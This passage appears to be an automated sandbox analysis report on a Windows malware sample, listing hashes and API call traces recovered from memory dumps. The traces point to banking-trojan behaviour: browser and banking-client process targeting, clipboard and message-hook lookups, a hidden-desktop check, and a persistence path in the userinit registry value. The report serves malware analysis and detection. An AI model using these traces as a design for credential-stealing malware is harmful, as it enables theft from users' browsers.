                                                                                                                                                                                                            • Opcode ID: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                            • Instruction ID: f170fe93e02ccaf968bc2c6ae71e56240b4678089189b5983d08b015d4f9d182
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 735184B25143016BD331EB54C984FEB73E8ABD8754F404A2EF6846B1D0DB78DA44CBA6
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028D9
                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028EA
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 004028F6
                                                                                                                                                                                                            • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 00402906
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 0040290C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                            • String ID: PnSw$Wed Jul 6 06:49:26 20112$explorer.exe$winlogon.exe
                                                                                                                                                                                                            • API String ID: 3001685711-2911081799
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00402FF7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000300,004036DE,75B8E610,00402FDE), ref: 0040300F
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00403012
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000300), ref: 0040301F
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00403022
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,004036DE,004036DE,75B8E610,00402FDE), ref: 0040302B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 0040302E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,004036DE), ref: 0040303B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040303E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2629017576-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 004015C4
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004015CF
                                                                                                                                                                                                            • Process32First.KERNEL32 ref: 004015F5
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,?), ref: 00401610
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,?), ref: 0040161C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401638
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040164A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3955875343-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                            • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1545651562-3277137149
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                            • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1545651562-3277137149
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BB3300: IsUserAnAdmin.SHELL32 ref: 02BB3325
                                                                                                                                                                                                              • Part of subcall function 02BB3300: GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02BB3344
                                                                                                                                                                                                              • Part of subcall function 02BB3300: PathAddBackslashA.SHLWAPI(?), ref: 02BB3351
                                                                                                                                                                                                              • Part of subcall function 02BB3300: GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02BB336E
                                                                                                                                                                                                              • Part of subcall function 02BB3300: _snprintf.MSVCRT ref: 02BB3389
                                                                                                                                                                                                              • Part of subcall function 02BB3300: RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02BB33A7
                                                                                                                                                                                                              • Part of subcall function 02BB3300: RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02BB33FC
                                                                                                                                                                                                              • Part of subcall function 02BB3300: RegCloseKey.ADVAPI32(00000000), ref: 02BB340A
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BC6CAE
                                                                                                                                                                                                              • Part of subcall function 02BD5A50: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02BD5A7F
                                                                                                                                                                                                              • Part of subcall function 02BD5A50: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02BD5AB8
                                                                                                                                                                                                              • Part of subcall function 02BD5A50: _snprintf.MSVCRT ref: 02BD5B23
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\user\AppData\Roaming\), ref: 02BC6CC0
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\), ref: 02BC6CCB
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02BC6CDF
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02BC6CFB
                                                                                                                                                                                                            • GetCommandLineA.KERNEL32 ref: 02BC6D05
                                                                                                                                                                                                            • GetCommandLineW.KERNEL32 ref: 02BC6D3D
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(02BFFB68), ref: 02BC6D65
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02BC6D86
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BC6DA4
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02BC6DC5
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(00000000,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BC6DDF
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 02BC6DE9
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BC3530,00000000,00000000,00000000), ref: 02BC6E38
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6E4C
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC6E5D
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BC7DD0,00000000,00000000,00000000), ref: 02BC6E8C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6EA0
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC6EB1
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BC8080,00000000,00000000,00000000), ref: 02BC6EC6
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,69889106a), ref: 02BC6ED6
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BC6EF6
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02BC6F17
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(69889106a,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BC6F34
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 02BC6F3E
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(02BFFB80), ref: 02BC6F49
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BC79D0,00000000,00000000,00000000), ref: 02BC6F5B
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6F6B
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC6F7C
                                                                                                                                                                                                              • Part of subcall function 02BB6DE0: memset.MSVCRT ref: 02BB6E00
                                                                                                                                                                                                              • Part of subcall function 02BB6DE0: Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 02BB6E1C
                                                                                                                                                                                                              • Part of subcall function 02BB6DE0: CreateThread.KERNEL32(00000000,00000000,Function_00006A90,00000000,00000000,00000000), ref: 02BB6E78
                                                                                                                                                                                                              • Part of subcall function 02BB6DE0: WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,76F90F10,?,00000000,00000000), ref: 02BB6EA0
                                                                                                                                                                                                              • Part of subcall function 02BB6DE0: CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02BB6EB8
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BC6970,00000000,00000000,00000000), ref: 02BC6F91
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6FA1
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC6FB2
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BC54B0,00000000,00000000,00000000), ref: 02BC6FDC
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC6FF0
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7001
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC7010
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC7013
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC7020
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC7023
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02BC7047
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02BC7059
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 02BC7065
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BC7074
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\svchost.exe), ref: 02BC7090
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\iexplore.exe), ref: 02BC70B7
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\java.exe), ref: 02BC70CD
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\javaw.exe), ref: 02BC70E3
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\javaws.exe), ref: 02BC70F9
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\opera.exe), ref: 02BC710F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\firefox.exe), ref: 02BC7125
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\maxthon.exe), ref: 02BC713B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\avant.exe), ref: 02BC7151
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\mnp.exe), ref: 02BC7167
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\safari.exe), ref: 02BC717D
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\netscape.exe), ref: 02BC7193
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\tbb-firefox.exe), ref: 02BC71A9
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\frd.exe), ref: 02BC71BF
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02BC71D5
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02BC71EB
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCB8F0,00000000,00000000,00000000), ref: 02BC7219
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7233
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7240
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCEF80,00000000,00000000,00000000), ref: 02BC7255
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7269
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7276
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD0560,00000000,00000000,00000000), ref: 02BC728B
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC729F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC72AC
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD0E20,00000000,00000000,00000000), ref: 02BC72C1
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC72D5
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC72E2
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCF6A0,00000000,00000000,00000000), ref: 02BC72F7
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC730B
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7318
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCCB80,00000000,00000000,00000000), ref: 02BC732D
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7341
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC734E
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCCC20,00000000,00000000,00000000), ref: 02BC7363
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7377
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7384
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD1590,00000000,00000000,00000000), ref: 02BC7399
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC73AD
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC73BA
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD24D0,00000000,00000000,00000000), ref: 02BC73CF
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC73E3
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC73F0
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD31C0,00000000,00000000,00000000), ref: 02BC7405
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7419
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7426
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD32B0,00000000,00000000,00000000), ref: 02BC743B
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC744F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC745C
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCFE80,00000000,00000000,00000000), ref: 02BC7471
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7485
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7492
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD3480,00000000,00000000,00000000), ref: 02BC74A7
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC74BB
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC74C8
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD43F0,00000000,00000000,00000000), ref: 02BC74DD
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC74F1
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC74FE
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD47D0,00000000,00000000,00000000), ref: 02BC7513
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7527
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7534
                                                                                                                                                                                                              • Part of subcall function 02BC5720: memset.MSVCRT ref: 02BC5741
                                                                                                                                                                                                              • Part of subcall function 02BC5720: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,76F8F550,75777390,76F90A60), ref: 02BC5757
                                                                                                                                                                                                              • Part of subcall function 02BC5720: RtlAddVectoredExceptionHandler.NTDLL(00000001,02BB3A20), ref: 02BC5764
                                                                                                                                                                                                              • Part of subcall function 02BC5720: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02BC577F
                                                                                                                                                                                                              • Part of subcall function 02BC5720: CreateThread.KERNEL32(00000000,00000000,Function_0001A7B0,00000000,00000000,00000000), ref: 02BC5799
                                                                                                                                                                                                              • Part of subcall function 02BC5720: GetHandleInformation.KERNEL32(00000000,?), ref: 02BC57B1
                                                                                                                                                                                                              • Part of subcall function 02BC5720: CloseHandle.KERNEL32(00000000), ref: 02BC57C2
                                                                                                                                                                                                              • Part of subcall function 02BC5720: InitializeCriticalSection.KERNEL32(02BFFB50), ref: 02BC57D3
                                                                                                                                                                                                              • Part of subcall function 02BC5720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC57E9
                                                                                                                                                                                                              • Part of subcall function 02BC5720: GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02BC57FB
                                                                                                                                                                                                              • Part of subcall function 02BC5720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC581A
                                                                                                                                                                                                              • Part of subcall function 02BC5720: GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02BC5828
                                                                                                                                                                                                              • Part of subcall function 02BC5720: GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02BC5844
                                                                                                                                                                                                              • Part of subcall function 02BC5720: GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02BC5860
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD19A0,00000000,00000000,00000000), ref: 02BC7549
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC755D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC756A
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BD1C80,00000000,00000000,00000000), ref: 02BC757F
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC7593
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC75A0
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BB80C0,00000000,00000000,00000000), ref: 02BC75B5
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC75CD
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC75E6
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\isclient.exe), ref: 02BC75FD
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\ipc_full.exe), ref: 02BC7613
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\intpro.exe), ref: 02BC7625
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\cbsmain.dll), ref: 02BC7637
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\clmain.exe), ref: 02BC7649
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\core.exe), ref: 02BC765B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\rundll32.exe), ref: 02BC766D
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\notepad.exe), ref: 02BC767F
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 02BC76EC
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BC76FB
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02BC7714
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(00000000), ref: 02BC771B
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,69889606a), ref: 02BC7731
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BBBC50,00000000,00000000,00000000), ref: 02BC7745
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC775D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC776E
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007FD0,00000000,00000000,00000000), ref: 02BC7783
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BC779B
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC77AC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Create$Thread$Information$Close$Security$Descriptor$AddressProc$HeapProcessUser$AdminCriticalCurrentFreeInitializeModuleMutexPathSection$BackslashCommandConvertFileInfoLibraryLineLoadLocalNameNamedSaclStringVolume_snprintfmemset$DesktopDirectoryEnvironmentExceptionFolderHandlerMultipleObjectObjectsOpenQuerySleepSystemValidateValueVariableVectoredWaitWindowslstrcmpi
                                                                                                                                                                                                            • String ID: --no-sandbox$ --no-sandbox$69889106a$6988924Aa$69889606a$C:\Users\user\AppData\Roaming\$IsWow64Process$RtlFreeHeap$S:(ML;;NRNWNX;;;LW)$\avant.exe$\cbsmain.dll$\chrome.exe$\clmain.exe$\core.exe$\explorer.exe$\firefox.exe$\frd.exe$\iexplore.exe$\intpro.exe$\ipc_full.exe$\isclient.exe$\java.exe$\javaw.exe$\javaws.exe$\maxthon.exe$\mnp.exe$\netscape.exe$\notepad.exe$\opera.exe$\rundll32.exe$\safari.exe$\svchost.exe$\tbb-firefox.exe$kernel32.dll$ntdll.dll
                                                                                                                                                                                                            • API String ID: 1834009341-1062275841
                                                                                                                                                                                                            • Opcode ID: 7b964437f029fa5149bae66c0ba77c404d62993081a28f0ca6c61f134c4b30af
                                                                                                                                                                                                            • Instruction ID: 6cd75a8fa496be08719709b6edc995bb9f876f1e48dd8f08d25037a33eeef06f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b964437f029fa5149bae66c0ba77c404d62993081a28f0ca6c61f134c4b30af
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60629131A81319B6F77097A48D4AFAEA7AC9F44B44F7045D8FB05B70C0DFB09A059BA4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC5741
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,76F8F550,75777390,76F90A60), ref: 02BC5757
                                                                                                                                                                                                            • RtlAddVectoredExceptionHandler.NTDLL(00000001,02BB3A20), ref: 02BC5764
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02BC577F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001A7B0,00000000,00000000,00000000), ref: 02BC5799
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC57B1
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC57C2
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(02BFFB50), ref: 02BC57D3
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC57E9
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02BC57FB
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC581A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02BC5828
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02BC5844
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02BC5860
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(02BFFB38), ref: 02BC587B
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 02BC5882
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 02BC5892
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,02BB79E0,02C09E88), ref: 02BC58A8
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BC58C3
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02BC58D8
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(00000000), ref: 02BC58DF
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,69889606a), ref: 02BC58F1
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02BC590B
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 02BC591B
                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,02BBBB50,02BFEB74), ref: 02BC5931
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BC5940
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02BC5955
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(00000000), ref: 02BC595C
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,69889606a), ref: 02BC596E
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,java), ref: 02BC59A2
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,.exe), ref: 02BC59B4
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,frd.exe), ref: 02BC59CA
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02BC59E1
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02BC59EF
